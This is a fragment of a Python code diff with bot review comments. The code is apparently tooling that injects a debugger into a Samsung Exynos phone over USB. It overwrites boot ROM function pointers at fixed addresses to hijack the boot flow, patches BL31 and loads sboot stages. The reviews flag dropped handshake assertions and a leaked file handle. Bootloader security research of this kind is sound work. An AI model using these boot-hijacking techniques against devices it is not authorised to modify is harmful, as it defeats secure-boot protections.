@@ -599,8 +574,9 @@ class ExynosDevice(): logger.debug('State after setting up initial debugger') self.cd.arch_dbg.state.print_ctx() - # self.relocate_debugger() - DEBUGGER_ADDR = 0x2069000 #0x020c0000 + # dumped = self.dump_memory(0x20000, 0x2070000) + + DEBUGGER_ADDR = 0x2069000 ### Overwrite boot_usb_ra to our debugger self.cd.test_connection() @@ -638,13 +614,13 @@ class ExynosDevice(): # BL1 is loaded, now authenticat and patch it auth_bl1(DEBUGGER_ADDR) self.usb_write(b"FLSH") # Flush cache + hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4)) self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31 self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br")) jump_bl1(DEBUGGER_ADDR) - # ==== BL31 ==== assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" 
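Review bot: `hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4))` is added without a comment, and its purpose is only visible from the write-back to the same address much later in the method, outside this hunk; suggest `# keep the pointer currently at 0x020200dc so the original value can be written back after BL31`. In the first hunk, `# dumped = self.dump_memory(0x20000, 0x2070000)` is commented-out code left in the method body and should be deleted rather than carried. Both hunks sit inside a method whose start and end lie outside them.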
@@ -658,45 +634,42 @@ class ExynosDevice(): time.sleep(2) self.usb_read(0x200) # GiAs + # lr = self.cd.arch_dbg.state.LR + self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow + + # TODO patch verification + + + # self.cd.memwrite_region(0x0202010c - 52, p32(GADGET_RET0)) + + + # self.cd.memwrite_region(0x02024774, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR # self.cd.arch_dbg.state.X0 = 0x020347f0 # self.cd.arch_dbg.state.X1 = 0 # self.cd.restore_stack_and_jump(0x02030464) self.cd.restore_stack_and_jump(lr) - time.sleep(2) - assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" - - # ====== PATCHES TO BL31 here! ====== - self.cd.memwrite_region(0x02031008, b"ELH") - # Jump into BL31 + time.sleep(2) + self.usb_read(0x200) # GiAs + self.cd.memwrite_region(0x02031008, b"ELH") + # ====== PATCHES TO BL31 here! ====== + + + # Jump BL31 self.cd.restore_stack_and_jump(0x02024010) + + time.sleep(2) self.connect_device() - assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" - # print(self.cd.memdump_region(0x020200dc, 4)) - self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) #Sets jump/X1 address at X0 0x2048000 -> Entry point of BL2 - - # Boot mode? Not sure whether its important (related to boot type at function 02023800?) 
- # self.cd.memwrite_region(0x02020, p32(DEBUGGER_ADDR)) # Restore original boot flow - - # Jump into USB download function - self.cd.arch_dbg.state.LR = DEBUGGER_ADDR - - # WORKS - self.cd.restore_stack_and_jump(hijacked_fun) - - # WORKING UNTIL HERE + + # self.usb_read(0x200) # GiAs + # self.cd.restore_stack_and_jump(hijacked_fun) # ==== Stage 3 BL2 ==== - BL2_FUN = 0x2048000 - bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read() - # bl2 = bl2[:(0x02052bf4-0x02048000)] + b"00000000" + bl2[(0x02052bf4-0x02048000)+8:] - self.send_normal_stage(bl2) - - # self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) + self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) time.sleep(2) self.connect_device() @@ -704,6 +677,7 @@ class ExynosDevice(): # ==== Stage 4 ==== stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read() # Patching + # stage4_len = len(stage4) # patch_len = len(b"USB RECOVERY MODE") # patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE")))
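Review bot: After `self.cd.restore_stack_and_jump(lr)` the new code replaces the handshake assertion with an unchecked `self.usb_read(0x200)  # GiAs`, and the assertion after the later `self.connect_device()` is dropped outright, so a jump that does not return to the debugger is no longer detected and the following `memwrite_region(0x02031008, b"ELH")` is sent to a device in an unknown state; keep `assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"` at both points, or raise `RuntimeError` since `assert` is stripped under `-O`. `self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())` leaks the file handle; read the file under `with open(...) as f:` and pass the bytes. The comment `# Resore oginal boot flow` should read `# Restore original boot flow`, and the hunk leaves several blocks of commented-out code and runs of blank lines that should be removed. `lr` is used here while its only assignment in the hunk is commented out, so it presumably comes from earlier in the method — worth confirming; the method starts before this hunk and continues after it.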